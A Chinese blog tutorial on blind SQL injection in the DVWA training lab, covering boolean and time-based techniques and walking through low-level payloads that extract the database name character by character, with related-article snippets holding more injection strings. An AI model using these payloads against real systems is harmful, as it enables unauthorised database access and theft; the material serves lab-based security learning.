【DVWA靶场】Web安全之(布尔值/延时型)SQL盲注(超详细教程)

最新推荐文章于 2025-05-12 16:08:19 发布
最新推荐文章于 2025-05-12 16:08:19 发布
阅读量1.6k 收藏 25
点赞数 39
分类专栏: 网安学习 文章标签: web安全 DVWA sql sql盲注 网络安全 burpsuite
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/weixin_60838266/article/details/140675003
版权

SQL盲注原理

1.SQL盲注概念

   SQL Injection(Blind),即SQL盲注,与一般注入的区别在于,一般的注入攻击者可以直接从页面上看到注入语句的执行结果,而盲注时攻击者通常是无法从显示页面上获取执行结果,甚至连注入语句是否执行都无从得知,因此盲注的难度要比一般注入高。目前网络上现存的SQL注入漏洞大多是SQL盲注。

2.分类

基于布尔的盲注: 即可以根据返回页面判断条件真假的注入;基于时间的盲注: 即不能根据页面返回内容判断任何信息,用条件语句查看时间延迟语句是否执行(即页面返回时间是否增加)来判断;基于报错的盲注: 即页面会返回错误信息,或者把注入的语句的结果直接返回在页面中;

3.盲注测试思路

1.对于基于布尔的盲注,通过构造真or假判断条件(数据库各项信息取值的大小比较, 如:字段个数,字段长度、版本数值、字段名、字段名各组成部分在不同位置对应的字符ASCII码…), 将构造的sql语句提交到服务器,然后根据服务器对不同的请求返回不同的页面结果 (True、False);然后不断调整判断条件中的数值以逼近真实值,特别是需要关注 响应从True<–>False发生变化的转折点。

2.对于基于时间的盲注,通过构造真or假判断条件的sql语句, 且sql语句中根据需要联合使用sleep()函数一同向服务器发送请求, 观察服务器响应结果是否会执行所设置时间的延迟响应,以此来判断所构造条件的真or假(若执行sleep延迟,则表示当前设置的判断条件为真);然后不断调整判断条件中的数值以逼近真实值,最终确定具体的数值大小or名称拼写。

3.对于基于报错的盲注,搜寻查看网上部分Blog,基本是在rand()函数作为group by的字段进行联用的时候会违反Mysql的约定而报错。rand()随机不确定性,使得group by会使用多次而报错。

4.盲注渗透测试流程

1.判断是否存在注入,注入的类型

2.猜解当前数据库名称

3.猜解数据库中的表名

4.猜解表中的字段名

5.获取表中的字段值

6.验证字段值的有效性

7.获取数据库的其他信息:版本、用户…

实战教程

1、low等级

1.1代码审计

代码对参数id没有做任何检查、过滤,存在明显的SQL注入漏洞
同时SQL语句查询返回的结果只有两种:
存在:User ID exists in the database;不存在:User ID is MISSING from the database;
    单引号注入

$getid  = "SELECT first_name, last_name FROM users WHERE user_id = '$id';";

1.2漏洞利用

a基于布尔的盲注:

a.1判断是否存在注入,注入是字符型还是数字型

若1' and 1=1 #        //存在exists

1' and 1=2 #       //不存在missing

存在字符型注入

若1 and 1=1 #        //存在exists

1 and 1=2 #      //存在exists

这两个都是存在,不是数字型注入。输入1' and 1=1# 实际后台执行,返回存在。

SELECT first_name, last_name FROM users WHERE user_id = '1' and 1=1#';

输入1' and 1=2# 实际后台执行,返回不存在。

SELECT first_name, last_name FROM users WHERE user_id = '1' and 1=2#';

说明存在字符型的SQL盲注。

a.2猜解当前的数据库名称

猜解数据库名,首先要猜解数据库名的各个属性,然后挨个猜解字符。数据库名称的属性:字符长度、字符组成的元素(字符/数字/下划线/…)

        元素的位置(首位/第一位/…/末位)

2.1)判断数据库名称长度(二分法思维)

1' and length(database())>10 #          //missing

1' and length(database())>5 #           //missing

1' and length(database())>3 #          //exists

1' and length(database())=4 #         //exists

   

说明数据库名称长度为4个字符

SELECT first_name, last_name FROM users WHERE user_id = '1' and length(database())=4 # ';

2.2) 判断数据库名称的字符组成元素:

利用substr()函数从给定字符串中,从指定位置开始截取指定长度的字符串,分离出数据库名称的位置,并分别转换为ASCII,与对应的ASCII值比较大小,找到值相同的字符。

mysql数据库中的字符串函数substr()的参数含义。

用法:

substr(string, start, length);

string为字符串;

start为起始位置;

length为长度。

注意:mysql中substr()的start是从1开始的,而不是0

1' and ascii(substr(database(),1,1))>50 #             //exists

1' and ascii(substr(database(),1,1))=100 #           //exists

第一个字符为:100--->d

1' and ascii(substr(database(),2,1))=118 #            //exists

第二个字符为:118--->v

1' and ascii(substr(database(),3,1))=119 #           //exists

第三个字符为:119--->w

1' and ascii(substr(database(),4,1))=97 #            //exists

第四个字符为:97--->a      

   

最低0.47元/天 解锁文章
网络安全 | 2万字总结】SQL?这一篇就够了。
等风来
06-16 1万+
SQL注入(Blind)是一种常见的安全漏洞,它允许攻击者向应用程序的数据库中执行恶意的SQL查询。在传统的SQL注入攻击中,攻击者可以直接获取到应用程序返回的数据库错误信息或查询结果,从而了解到他们所注入的恶意SQL语句是否生效。但在(Blind)注入中,攻击者无法直接获取到这些信息,因此称之为""。在攻击中,攻击者通过构造恶意的注入语句,将其输入传递给应用程序处理。然后,攻击者观察应用程序的响应或其他可见的行为来确定注入是否成功,并进一步探测和利用数据库中的数据。在本文中,我们深入探讨了。
SQL注入之路之二:布尔(boolean)
weixin_62715196的博客
08-10 1688
简单描述什么是布尔以及对与布尔如何进行注入,通过使用SQLmap自动化工具和人工结合burp suite两种方式讲述如何进行简单注入,并通过对DVWA靶场进行实操来验证手工结合burp suite实现布尔注入的合理性
SQL注入)--DVWA
xy_sugar的博客
01-24 831
概述 、 分类:布尔延时 LOW等级 手工 1、首先了解业务,这里和回显注入不一样,不会显示id对应的用户名,只是告诉我们他存在即为真 输入-1,返回为假 三种注入POC(真 and 假=假) 尝试第一种情况,返回为真,说明数据没有注入进去,不存在SQL注入漏洞 输入第二种情况1' and '1024'='1025 ,返回结果为假没说明存在注入漏洞 尝...
DVWA-sql
Darklord.W
04-09 935
sql低中高步骤截图及说明 低等级: 判断是否存在注入注入是字符还是数字 猜解数据库 库名长度为4 猜数据库名dvwa substr() 函数返回字符串的一部分 substr(string,start,length) 猜数据库中表名 可得表个数为2 猜表的长度 第一个为9,第二个为5 猜表名 1' and ascii(substr(...
DVWA靶场保姆级通关教程--08SQL(上)
最新发布
m0_74020575的博客
05-12 1206
SQL是一种特殊的SQL注入攻击,攻击者通过构造恶意SQL语句操控后台数据库,但无法直接获取错误信息或查询结果,只能通过观察应用程序响应的细微差异(如页面跳转、响应时间等)来推断数据库信息。
DVWASQL注入
天空之蓝的博客
11-17 4543
SQL Injection(Blind),即SQL,与一般注入的区别在于,一般的注入攻击者可以直接从页面上看到注入语句的执行结果,而时攻击者通常是无法从显示页面上获取执行结果,甚至连注入语句是否执行都无从得知,因此的难度要比一般注入高。目前网络上现存的SQL注入漏洞大多是SQL。手工的过程,就像你与一个机器人聊天,这个机器人知道的很多,但只会回答“是”或者“不是”,因此你需要询问它这样的问题,例如“数据库名字的第一个字母是不是a啊?”,通过这种机械的询问,最终获得你想要的数据。
DVWAsql注入——
Williamanddog的博客
12-22 3529
DVWA
DVWA-SQL
HoYim
03-05 642
基于布尔的 判断是否存在注入注入是字符还是数字 输入1’and ‘1’=‘1,判断条件正确 输入1’ and ‘1’=‘2,判断条件错误 由此判断存在字符注入 2.猜解当前数据库名 猜数据库名的长度 输入1’ and length(database())=4# 确定长度为4 然后猜数据库名字,可用二分法节省时间 输入1’ and ascii(substr(databse(),0...
DVWAsql
qq_39670065的博客
08-08 3009
写在前面: 当时刷sqli-labs也浑浑噩噩没有做啥总结,现在就先从sql总结开始吧 SQL Injection(Blind) SQL与一般注入的区别在于:一般的注入攻击者可以直接从页面上看到注入语句的执行结果,而时攻击者通常是无法从显示页面上获取执行结果,甚至连注入语句是否执行都无从得知 sql又分为布尔,时间和基于报错的 理论上,能够布尔就一定能时间,能够时间不一定能布尔。相比之下,布尔稳定性更好,时间适用范围更广,但因为时间的实现原理是基
DVWA靶场-Brute Force暴力破解
mlws1900的博客
03-12 2005
具体来说,它使用了mysqli_real_escape_string()函数对用户输入的用户名进行转义,确保特殊字符在SQL语句中不会被误解为SQL语句的一部分,从而保护数据库安全。进入暴力破解的界面,有点基础的都知道,在bp中通过字典,导入用户名和密码进行爆破,这样的操作大家见多了,再写没啥意思,想看的可以去pikachu靶场的暴力破解去了解具体操作,本文主要结合代码进行分析。3.high-高等安全等级,有安全措施保护,是中等安全等级的加深,这个等级下的安全漏洞可能不允许相同程度的攻击。
DVWA靶场-SQL Injection (Blind)SQL注入
mlws1900的博客
03-19 1747
直接使用报错:' union select 1,count(*),concat('/',(select @@datadir),'/',floor(rand(0)*2))a from information_schema.columns group by a--+,与一般注入的区别在于,一般的注入攻击者可以直接从页面上看到注入语句的执行结果,而时攻击者通常是无法从显示页面上获取执行结果,甚至连注入语句是否执行都无从得知,因此的难度要比一般注入高。length:正整数,指定将从左边返回的字符数。
dvwa-sql
01mx的博客
02-05 583
SQL VS 普通SQL注入: 普通SQL注入: 1.执行SQL注入攻击时,服务器会响应来自数据库服务器的错误信息,信息提示SQL语法不正确等 2.一般在页面上直接就会显示执行sql语句的结果 SQL:(不显示错误信息,不能在前端显示) 1.一般情况,执行SQL,服务器不会直接返回具体的数据库错误or die语法错误,而是会返回程序开发所设置的特定信息(也有特例,如基于报错的) 2.一般在页面上不会直接显示sql执行的结果 3.有可能出现不确定sql是否执行的情况 SQL-测试流程 1.
dvwaSQL
ANDTM的博客
05-30 1293
SQL注入,就是通过把SQL命令插入到Web表单提交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令。具体来说,它是利用现有应用程序,将(恶意的)SQL命令注入到后台数据库引擎执行的能力,它可以通过在Web表单中输入(恶意)SQL语句得到一个存在安全漏洞的网站上的数据库,而不是按照设计者意图去执行SQL语句。SQLSQL注入的区别就是它不会有完整的回显,这里分为两种,一种是布尔,另一种是时间
DVWASQL
随 风
10-27 627
一、SQL过程 (1)判断是否存在注入注入是字符还是数字; (2)猜解当前数据库名---->猜解数据库名长度---->猜解数据库名称; (3)猜解数据库中的表名---->猜解表数量---->猜解表长度---->猜解表名称; (4)猜解表中字段名---->猜解当前表中有多少个字段---->猜解字段长度---->猜解字段名称 (5)猜解数据 二、SQL Injection(Blind) 1、Low级别 布尔 (1)判断是否存在注入注入是字符还是
DVWA-----------sql
haha1314的博客
05-18 516
SQL的类: 基于布尔值 基于时间的 基于报错的 SQL的过程: 1、判断是否存在注入 2、猜解当前数据库名:长度和名称 3、猜解数据库中的表名:长度和名称,表的数量 4、猜解表中的字段名:长度和名称,字段数 5、猜解数据 一、low级别 正常回显 错误回显 1、判断是否有注入点 输入1 and 1=1,正常回显 输入1 and 1=2,正常回显 不属于数字,采用字符...
DVWASQL Injection Blind(SQL
RexHa的博客
10-04 2794
DVWA sql
DVWA——SQL(全等级)
@一只躺平的猪@的博客
07-13 6456
SQL与一般注入的区别在于:一般的注入攻击者可以直接从页面上看到注入语句的执行结果,而时攻击者通常是无法从显示页面上获取执行结果,甚至连注入语句是否执行都无从得知。一般有两种方式:布尔和时间。还有一种是报错注入,本章主要介绍布尔。布尔是根据页面是否正确显示来判断我们构造的语句是否正确执行时间则是根据页面加载时间是否变化来判断的。SQL注入,就是通过把SQL命令插入到Web表单提交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令。具体来说,它是利用现有应用程序,将(
DVWASQL注入
chtdgf的博客
02-14 1217
DVWASQL注入 一 LOW级别 我们可以通过 View Source获得代码如下 <?php if( isset( $_GET[ 'Submit' ] ) ) { // Get input $id = $_GET[ 'id' ]; // Check database $getid = "SELECT first_name, last_name FROM users WHERE user_id = '$id';"; $result = mysql
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值